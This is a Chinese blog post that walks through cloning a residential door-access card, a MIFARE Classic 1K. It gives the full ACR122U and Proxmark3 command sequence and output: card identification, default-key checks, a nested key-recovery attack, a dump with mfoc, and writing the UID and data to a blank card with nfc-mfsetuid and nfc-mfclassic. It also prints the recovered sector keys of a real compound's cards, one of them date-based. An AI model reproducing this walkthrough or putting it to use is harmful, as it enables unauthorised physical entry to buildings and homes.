因为换工作,搬到了新的小区,于是新的玩具(门禁卡)到手。
照例,老套路。
先acr122判断卡类型1
2
3
4
5
6
7
8nfc-list
nfc-list uses libnfc 1.7.1
NFC device: ACR122U Smart Card Reader / opened
1 ISO14443A passive target(s) found:
ISO/IEC 14443A (106 kbps) target:
ATQA (SENS_RES): 00 04
UID (NFCID1): 1e aa 7b 55
SAK (SEL_RES): 08
看到ISO14443A和ATQA是0004
初步推断是m1卡
因为不知道是否是全加密
mfoc一把梭1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23mfoc -O xxx.dump
Found Mifare Classic 1k tag
ISO/IEC 14443A (106 kbps) target:
ATQA (SENS_RES): 00 04
* UID size: single
* bit frame anticollision supported
UID (NFCID1): 1e aa 7b 55
SAK (SEL_RES): 08
* Not compliant with ISO/IEC 14443-4
* Not compliant with ISO/IEC 18092
Fingerprinting based on MIFARE type Identification Procedure:
* MIFARE Classic 1K
* MIFARE Plus (4 Byte UID or 4 Byte RID) 2K, Security level 1
* SmartMX with MIFARE 1K emulation
Other possible matches based on ATQA & SAK values:
Try to authenticate to all sectors with default keys...
Symbols: '.' no key found, '/' A key found, '\' B key found, 'x' both keys found
nfc_initiator_mifare_cmd: Invalid argument(s)
[Key: ffffffffffff] -> [#
然后就停止了
m1是没错
这是不兼容还是咋滴?
不会是cpu卡吧。。感觉遇到了挑战。。
透露下,那个小区的房子也是用这张卡打开。
上proxmark3
查看卡片信息1
2
3
4
5
6
7
8
9
10
11
12
13proxmark3> hf 14a reader
Waiting for a response from the proxmark...
Don't forget to cancel its operation first by pressing on the button
#db# Stopped
UID : 1e aa 7b 55
ATQA : 00 04
SAK : 08 [2]
TYPE : NXP MIFARE CLASSIC 1k | Plus 2k SL1
proprietary non iso14443-4 card found, RATS not supported
Answers to chinese magic backdoor commands: NO
查看是否存在默认密码1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61proxmark3> hf mf chk *1 ? t
No key specified, trying default keys
chk default key[ 0] ffffffffffff
chk default key[ 1] 000000000000
chk default key[ 2] a0a1a2a3a4a5
chk default key[ 3] b0b1b2b3b4b5
chk default key[ 4] aabbccddeeff
chk default key[ 5] 4d3a99c351dd
chk default key[ 6] 1a982c7e459a
chk default key[ 7] d3f7d3f7d3f7
chk default key[ 8] 714c5c886e97
chk default key[ 9] 587ee5f9350f
chk default key[10] a0478cc39091
chk default key[11] 533cb6c723f6
chk default key[12] 8fd0a4f256e9
--sector: 0, block: 3, key type:A, key count:13
Found valid key:[ffffffffffff]
--sector: 1, block: 7, key type:A, key count:13
--sector: 2, block: 11, key type:A, key count:13
...
Found valid key:[ffffffffffff]
--sector:10, block: 43, key type:A, key count:13
Found valid key:[ffffffffffff]
--sector:11, block: 47, key type:A, key count:13
Found valid key:[ffffffffffff]
--sector:12, block: 51, key type:A, key count:13
Found valid key:[ffffffffffff]
--sector:13, block: 55, key type:A, key count:13
Found valid key:[ffffffffffff]
--sector:14, block: 59, key type:A, key count:13
Found valid key:[ffffffffffff]
--sector:15, block: 63, key type:A, key count:13
Found valid key:[ffffffffffff]
--sector: 0, block: 3, key type:B, key count:13
Found valid key:[ffffffffffff]
--sector: 1, block: 7, key type:B, key count:13
--sector: 2, block: 11, key type:B, key count:13
...
Found valid key:[ffffffffffff]
--sector:10, block: 43, key type:B, key count:13
Found valid key:[ffffffffffff]
--sector:11, block: 47, key type:B, key count:13
Found valid key:[ffffffffffff]
--sector:12, block: 51, key type:B, key count:13
Found valid key:[ffffffffffff]
--sector:13, block: 55, key type:B, key count:13
Found valid key:[ffffffffffff]
--sector:14, block: 59, key type:B, key count:13
Found valid key:[ffffffffffff]
--sector:15, block: 63, key type:B, key count:13
Found valid key:[ffffffffffff]
Found keys have been transferred to the emulator memory
中间省略一些
用已知密码探测其他扇区(nested攻击)1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68proxmark3> hf mf nested 1 3 A FFFFFFFFFFFF d
Testing known keys. Sector count=16
nested...
-----------------------------------------------
uid:1eaa7b55 trgbl=4 trgkey=0
-----------------------------------------------
uid:1eaa7b55 trgbl=4 trgkey=1
-----------------------------------------------
uid:1eaa7b55 trgbl=8 trgkey=0
Found valid key:201604139999
-----------------------------------------------
uid:1eaa7b55 trgbl=8 trgkey=1
-----------------------------------------------
uid:1eaa7b55 trgbl=12 trgkey=0
Found valid key:201604139999
-----------------------------------------------
uid:1eaa7b55 trgbl=4 trgkey=0
Found valid key:abc6d5e4f3ba
-----------------------------------------------
uid:1eaa7b55 trgbl=4 trgkey=1
Found valid key:abc6d5e4f3ba
-----------------------------------------------
uid:1eaa7b55 trgbl=8 trgkey=1
-----------------------------------------------
uid:1eaa7b55 trgbl=16 trgkey=0
Found valid key:201604139999
-----------------------------------------------
uid:1eaa7b55 trgbl=16 trgkey=1
-----------------------------------------------
Time in nested: 30.536 (0.599 sec per key)
-----------------------------------------------
Iterations count: 51
|---|----------------|---|----------------|---|
|sec|key A |res|key B |res|
|---|----------------|---|----------------|---|
|000| ffffffffffff | 1 | ffffffffffff | 1 |
|001| abc6d5e4f3ba | 1 | abc6d5e4f3ba | 1 |
|002| 201604139999 | 1 | 000000000000 | 0 |
|003| 201604139999 | 1 | 201604139999 | 1 |
|004| 201604139999 | 1 | 201604139999 | 1 |
|005| 201604139999 | 1 | 201604139999 | 1 |
|006| 201604139999 | 1 | 201604139999 | 1 |
|007| 201604139999 | 1 | 201604139999 | 1 |
|008| 201604139999 | 1 | 201604139999 | 1 |
|009| ffffffffffff | 1 | ffffffffffff | 1 |
|010| ffffffffffff | 1 | ffffffffffff | 1 |
|011| ffffffffffff | 1 | ffffffffffff | 1 |
|012| ffffffffffff | 1 | ffffffffffff | 1 |
|013| ffffffffffff | 1 | ffffffffffff | 1 |
|014| ffffffffffff | 1 | ffffffffffff | 1 |
|015| ffffffffffff | 1 | ffffffffffff | 1 |
|---|----------------|---|----------------|---|
Printing keys to binary file dumpkeys.bin...
有了key了我们可以用mfoc指定key来破解
将key放入keys.txt
mfoc是使用acr122设备
然后mfoc
还是mfoc导出dump比较方便
1 | mfoc -f keys.txt -O xxx.dump |
后面的扇区数据就不显示了
卡数据已经保存到xxx.dump中了
btw,有个key是201604139999,这很明显是个日期
于是搜索了下 “小区名 2016”
原来这个日期在交房的前后,可能是物业做卡的时间 2333~
写卡 用acr122写会比较方便
先setuid1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23nfc-mfsetuid 1eaa7b55
NFC reader: ACR122U Smart Card Reader / opened
Sent bits: 26 (7 bits)
Received bits: 04 00
Sent bits: 93 20
Received bits: 1e aa 7b 55 9a
Sent bits: 93 70 1e aa 7b 55 9a 15 4d
Received bits: 08 b6 dd
Found tag with
UID: 1eaa7b55
ATQA: 0004
SAK: 08
Sent bits: 50 00 57 cd
Sent bits: 40 (7 bits)
Received bits: a (4 bits)
Sent bits: 43
Received bits: 0a
Sent bits: a0 00 5f b1
Received bits: 0a
Sent bits: 1e aa 7b 55 9a 08 04 00 46 59 25 58 49 10 23 02 02 4b
Received bits: 0a
因为已经写过了 所以显示id一样了
然后写入数据
1 | nfc-mfclassic W b xxx.dump xxx.dump |
这样就复制好了
测试后可用
解释下参数:
write to (w)
unlocked write to (W) card
大写W是解锁后写卡
小写b是使用key b执行操作,一旦有错误就终止
第一个dump是用来读取key
第二个dump是写入卡的数据